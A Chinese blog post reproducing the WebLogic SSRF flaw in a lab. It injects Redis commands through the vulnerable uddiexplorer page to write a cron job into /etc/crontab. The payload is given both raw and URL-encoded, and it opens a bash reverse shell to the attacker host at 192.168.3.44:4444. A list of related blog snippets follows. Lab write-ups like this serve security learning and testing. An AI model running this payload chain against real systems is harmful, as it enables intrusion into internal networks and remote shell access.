Weblogic SSRF漏洞复现

已于 2023-10-15 17:52:42 修改
阅读量176 收藏
点赞数
文章标签: 网络安全
于 2023-10-15 17:51:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44674058/article/details/133842282
版权

漏洞简介

        Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

测试环境 

Weblogic靶机环境:192.168.3.50

Redis容器:172.19.0.2

攻击机:192.168.3.44

漏洞复现

Weblogic的漏洞存在于:http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp

使用burp抓包

operator参数可控

探测开放端口

端口未开放提示信息:

端口开放提示信息:

根据返回内容的不同判断端口是否开放

反弹shell 

探测redis端口是否开放

6379端口开放

利用计划任务反弹shell,将shell脚本写入/etc/crontab

set 1 "\n\n\n\n* * * * * root bash -c 'sh -i >& /dev/tcp/192.168.3.44/4444 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

转换成URL编码,换行符是"\r\n",编码后是"%0D%0A"

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.3.44%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

攻击机监听端口

使用Burp发送

反弹成功

学海柳下惠
关注
weblogic ssrf 漏洞复现
薛定谔嘚喵博客
05-06 649
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
Weblogic-SSRF漏洞复现
m0_48520508的博客
12-14 347
0x00简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 SSRF简介 服务端请求伪造(Server-Side Request Forgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 SSRF形成的原因大都是由于服务端提供了从其他服务
我眼中的Weblogic-SSRF
ovowovo的博客
12-10 781
一、ssrf简述: SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统(正是因为他是有服务器端发起的,所以他能够请求到与他相连而与外网隔离的内部系统) 影响版本:10.0.2.0 10.3.6.0 SSRF危害以及可实现的攻击行为 主...
Weblogic ssrf
沐目的博客
07-30 2129
集训第五周 星期一~二 一.首先总结知识点: 1.ssrf: 服务端请求伪造,好像有三种利用方式,但是我目前就只会最普通的一种,利用SSRF进行端口探测,也是写这道题需要用的。有时候服务端的一个内网中有漏洞,可是我们又没有办法直接访问,所以我们就需要通过服务器,去访问服务器的内网,所以叫服务端请求伪造。有这个漏洞的条件,就是服务器端,需要有与内网传输数据的接口,要不然无法访问内网啊。通常情况下,比...
Weblogic SSRF
最新发布
weixin_45653478的博客
05-15 1160
SSRF漏洞通常是由于服务端提供了从其他服务器应用获取数据的功能,并且没有对目标地址进行过滤与限制。攻击者可以利用这个漏洞,通过篡改获取资源的请求发送给服务器,服务器在没有发现这个请求是非法的情况下,会以自身的身份去访问其他服务器的资源。
weblogic ssrf漏洞复现
m0_71635484的博客
03-20 312
weblogic ssrf漏洞复现
weblogicssrf漏洞修复_Weblogic SSRF漏洞
weixin_35860326的博客
12-09 661
一、漏洞概述: Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。二、漏洞环境搭建: 1、使用docker+vulhub安装(菜没有办法)2、查看是否安装成功(注意需要访问的是7001端口)成功安装三、漏洞验证 1、验证漏洞是否存在,点击Search P...
Weblogic SSRF 漏洞复现
qq_45953122的博客
09-12 494
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
weblogicssrf漏洞修复_WebLogic SSRF 及漏洞修复
weixin_39928993的博客
01-13 869
SSRF漏洞,也称为XSPA(跨站端口攻击),问题存在于应用程序在加载用户提供的URL时,没能正确验证服务器的响应,然后就反馈回了客户端。攻击者可以利用该漏洞绕过访问限制(如防火墙),进而将受感染的服务器作为代理进行端口扫描,甚至访问系统中的数据。CVE-2014-4210, Server Side Request Forgery in SerachPublicRegistries.jsp 版本1...
weblogicssrf漏洞修复_Weblogic-SSRF漏洞复现
weixin_39922361的博客
12-22 405
一、环境靶机:centos7虚拟机 ip:192.168.8.11物理机:windows10burp suite二、原理SSRF原理:是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,所...
weblogicssrf漏洞修复_Weblogic SSRF漏洞复现
weixin_32137855的博客
01-13 462
一、使用docker搭建环境访问7001端口二、漏洞复现步骤1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp2、检查一下IBM这个地方看看发现是个连接,这就可能存在ssrf了3、使用burp suite抓包,点击Search4、修改operator参数的连接5、访问结果访问不存在的端口返回could not connect over HTTP访问...
weblogicssrf漏洞修复_weblogic漏洞系列-SSRF漏洞
weixin_30923011的博客
12-31 260
0x01前言:SSRF漏洞的原理这里就不在细说了,这里主要讲解weblogicSSRF漏洞的检测办法,以及利用手段。0x02检测漏洞:image.png2.2、向服务器提交以下参数?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&bt...
SSRF,以weblogic为案例
weixin_45694388的博客
10-19 1542
复习一下ssrf的原理及危害,并且以weblog的ssrf漏洞为案例 漏洞原理 SSRF(Server-side Request Forge, 服务端请求伪造) 通常用于控制web进而探测内网服务以及攻击内网脆弱应用 即当作跳板机,可作为ssrfsocks代理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。SSRF 形成的原因大都是由于服务端提供了从其他服务
weblogic-SSRF
anna11119的博客
07-26 673
https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf Weblogic SSRF漏洞 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 测试环境搭建 编译及启动测试环境 docker-compose build docker-comp...
Weblogic SSRF漏洞(CVE-2014-4210)
谢公子的博客
05-03 6376
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 关于SSRF漏洞我们就不讲了,传送门——>SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞。 该漏洞存在于:http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp页...
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值